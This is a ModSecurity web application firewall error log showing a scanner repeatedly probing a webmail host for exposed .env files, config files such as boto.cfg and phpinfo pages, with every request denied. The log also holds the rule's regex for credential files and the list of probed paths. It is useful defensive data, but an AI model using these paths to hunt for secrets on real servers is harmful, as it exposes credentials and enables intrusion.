[Tue May 26 13:32:25.243362 2026] [security2:error] [pid 512344:tid 512552] [client 45.148.10.95:7394] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/current/.env"] [unique_id "ahVTkcbElyei4S77DQcN7AAAAE4"]
[Tue May 26 13:32:25.255580 2026] [security2:error] [pid 512745:tid 512877] [client 45.148.10.95:7514] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/demo/.env"] [unique_id "ahVTkXKSB_s2CvZg7xN5TgAAAQw"]
[Tue May 26 13:32:25.266210 2026] [security2:error] [pid 512344:tid 512487] [client 45.148.10.95:7554] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/dev/.env"] [unique_id "ahVTkcbElyei4S77DQcN7wAAAA0"]
[Tue May 26 13:32:25.280833 2026] [security2:error] [pid 512745:tid 512938] [client 45.148.10.95:7468] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/develop/.env"] [unique_id "ahVTkXKSB_s2CvZg7xN5VAAAAUk"]
[Tue May 26 13:32:25.295680 2026] [security2:error] [pid 512745:tid 512924] [client 45.148.10.95:7526] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/developer/.env"] [unique_id "ahVTkXKSB_s2CvZg7xN5VQAAATs"]
[Tue May 26 13:32:25.298460 2026] [security2:error] [pid 512745:tid 512892] [client 45.148.10.95:7564] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/development/.env"] [unique_id "ahVTkXKSB_s2CvZg7xN5VgAAARs"]
[Tue May 26 13:32:25.470192 2026] [security2:error] [pid 512344:tid 512503] [client 45.148.10.95:7446] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/erp/.env"] [unique_id "ahVTkcbElyei4S77DQcN-QAAAB0"]
[Tue May 26 13:32:25.488092 2026] [security2:error] [pid 512344:tid 512482] [client 45.148.10.95:7550] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/etc/apache2/apache2.conf"] [unique_id "ahVTkcbElyei4S77DQcN-gAAAAg"]
[Tue May 26 13:32:25.498403 2026] [security2:error] [pid 512745:tid 512952] [client 45.148.10.95:7416] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/etc/boto.cfg"] [unique_id "ahVTkXKSB_s2CvZg7xN5YAAAAVc"]
[Tue May 26 13:32:25.504489 2026] [security2:error] [pid 512745:tid 512969] [client 45.148.10.95:7418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/fe/.env"] [unique_id "ahVTkXKSB_s2CvZg7xN5YQAAAWg"]
[Tue May 26 13:32:25.541238 2026] [security2:error] [pid 512344:tid 512518] [client 45.148.10.95:7368] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/front/.env"] [unique_id "ahVTkcbElyei4S77DQcN_QAAACw"]
[Tue May 26 13:32:25.550253 2026] [security2:error] [pid 512344:tid 512570] [client 45.148.10.95:7632] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/frontend/.env"] [unique_id "ahVTkcbElyei4S77DQcN_wAAAGA"]
[Tue May 26 13:32:25.626979 2026] [security2:error] [pid 512745:tid 512884] [client 45.148.10.95:7416] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/info.php"] [unique_id "ahVTkXKSB_s2CvZg7xN5cgAAARM"]
[Tue May 26 13:32:25.638433 2026] [security2:error] [pid 512745:tid 512909] [client 45.148.10.95:7418] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/infophp.php"] [unique_id "ahVTkXKSB_s2CvZg7xN5dAAAASw"]
[Tue May 26 13:32:25.641196 2026] [security2:error] [pid 512344:tid 512561] [client 45.148.10.95:7586] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/infos.php"] [unique_id "ahVTkcbElyei4S77DQcOBgAAAFc"]
[Tue May 26 13:32:25.659006 2026] [security2:error] [pid 512745:tid 512898] [client 45.148.10.95:7718] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/laravel/.env"] [unique_id "ahVTkXKSB_s2CvZg7xN5dwAAASE"]
[Tue May 26 13:32:25.669979 2026] [security2:error] [pid 512344:tid 512550] [client 45.148.10.95:7368] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/lms/.env"] [unique_id "ahVTkcbElyei4S77DQcOCAAAAEw"]
[Tue May 26 13:32:25.679980 2026] [security2:error] [pid 512745:tid 512890] [client 45.148.10.95:7514] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/local/.env"] [unique_id "ahVTkXKSB_s2CvZg7xN5eAAAARk"]
[Tue May 26 13:32:25.707931 2026] [security2:error] [pid 512745:tid 512941] [client 45.148.10.95:7564] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/market/.env"] [unique_id "ahVTkXKSB_s2CvZg7xN5fAAAAUw"]
[Tue May 26 13:32:25.748252 2026] [security2:error] [pid 512745:tid 512908] [client 45.148.10.95:7526] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/marketing/.env"] [unique_id "ahVTkXKSB_s2CvZg7xN5fgAAASs"]
[Tue May 26 13:32:25.758609 2026] [security2:error] [pid 512745:tid 512905] [client 45.148.10.95:7732] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/media/.env"] [unique_id "ahVTkXKSB_s2CvZg7xN5fwAAASg"]
[Tue May 26 13:32:25.785644 2026] [security2:error] [pid 512745:tid 512990] [client 45.148.10.95:7718] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/new/.env"] [unique_id "ahVTkXKSB_s2CvZg7xN5ggAAAX0"]
[Tue May 26 13:32:25.789895 2026] [security2:error] [pid 512745:tid 512882] [client 45.148.10.95:7578] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/node-api/.env"] [unique_id "ahVTkXKSB_s2CvZg7xN5gwAAARE"]
[Tue May 26 13:32:25.793130 2026] [security2:error] [pid 512344:tid 512514] [client 45.148.10.95:7394] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/node/.env"] [unique_id "ahVTkcbElyei4S77DQcODwAAACg"]
[Tue May 26 13:32:25.797785 2026] [security2:error] [pid 512344:tid 512542] [client 45.148.10.95:7368] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/node/api/.env"] [unique_id "ahVTkcbElyei4S77DQcOEAAAAEQ"]
[Tue May 26 13:32:25.807962 2026] [security2:error] [pid 512745:tid 512911] [client 45.148.10.95:7514] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/node/backend/.env"] [unique_id "ahVTkXKSB_s2CvZg7xN5hAAAAS4"]
[Tue May 26 13:32:25.819281 2026] [security2:error] [pid 512344:tid 512544] [client 45.148.10.95:7632] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/nodeapi/.env"] [unique_id "ahVTkcbElyei4S77DQcOEQAAAEY"]
[Tue May 26 13:32:25.830093 2026] [security2:error] [pid 512344:tid 512551] [client 45.148.10.95:7494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/nodeweb/.env"] [unique_id "ahVTkcbElyei4S77DQcOEgAAAE0"]
[Tue May 26 13:32:25.846840 2026] [security2:error] [pid 512344:tid 512476] [client 114.119.135.84:39837] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahVTkcbElyei4S77DQcOEwAAAAI"], referer: https://www.deepbluedirectory.com/Health/Society/World/Shopping/Arts/Personal_Pages/Home/Homeowners/Sports/Badminton/Regional/Africa/Namibia/
[Tue May 26 13:32:25.878984 2026] [security2:error] [pid 512745:tid 512958] [client 45.148.10.95:7526] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/old/.env"] [unique_id "ahVTkXKSB_s2CvZg7xN5igAAAV0"]
[Tue May 26 13:32:25.896883 2026] [security2:error] [pid 512344:tid 512569] [client 45.148.10.95:7446] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/opt/.env"] [unique_id "ahVTkcbElyei4S77DQcOFQAAAF8"]
[Tue May 26 13:32:25.897470 2026] [security2:error] [pid 512745:tid 512914] [client 4.228.83.111:37739] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.aastha-enterprises.com"] [uri "/aa.php"] [unique_id "ahVTkXKSB_s2CvZg7xN5jQAAATE"]
[Tue May 26 13:32:25.897546 2026] [security2:error] [pid 512745:tid 512914] [client 4.228.83.111:37739] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.aastha-enterprises.com"] [uri "/aa.php"] [unique_id "ahVTkXKSB_s2CvZg7xN5jQAAATE"]
[Tue May 26 13:32:26.064803 2026] [security2:error] [pid 512344:tid 512556] [client 45.148.10.95:7394] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/php-info.php"] [unique_id "ahVTksbElyei4S77DQcOHQAAAFI"]
[Tue May 26 13:32:26.072780 2026] [security2:error] [pid 512745:tid 512917] [client 45.148.10.95:7704] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/php.php"] [unique_id "ahVTknKSB_s2CvZg7xN5nQAAATQ"]
[Tue May 26 13:32:26.073970 2026] [security2:error] [pid 512344:tid 512593] [client 45.148.10.95:7368] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/php_info.php"] [unique_id "ahVTksbElyei4S77DQcOHgAAAHc"]
[Tue May 26 13:32:26.087326 2026] [security2:error] [pid 512745:tid 512886] [client 45.148.10.95:7578] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/phpinfo.php"] [unique_id "ahVTknKSB_s2CvZg7xN5ngAAARU"]
[Tue May 26 13:32:26.090785 2026] [security2:error] [pid 512745:tid 512964] [client 45.148.10.95:7514] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/portal/.env"] [unique_id "ahVTknKSB_s2CvZg7xN5nwAAAWM"]
[Tue May 26 13:32:26.121896 2026] [security2:error] [pid 512745:tid 512993] [client 45.148.10.95:7564] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/prod/.env"] [unique_id "ahVTknKSB_s2CvZg7xN5ogAAAYA"]
[Tue May 26 13:32:26.145916 2026] [security2:error] [pid 512745:tid 512932] [client 45.148.10.95:7526] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/product/.env"] [unique_id "ahVTknKSB_s2CvZg7xN5pAAAAUM"]
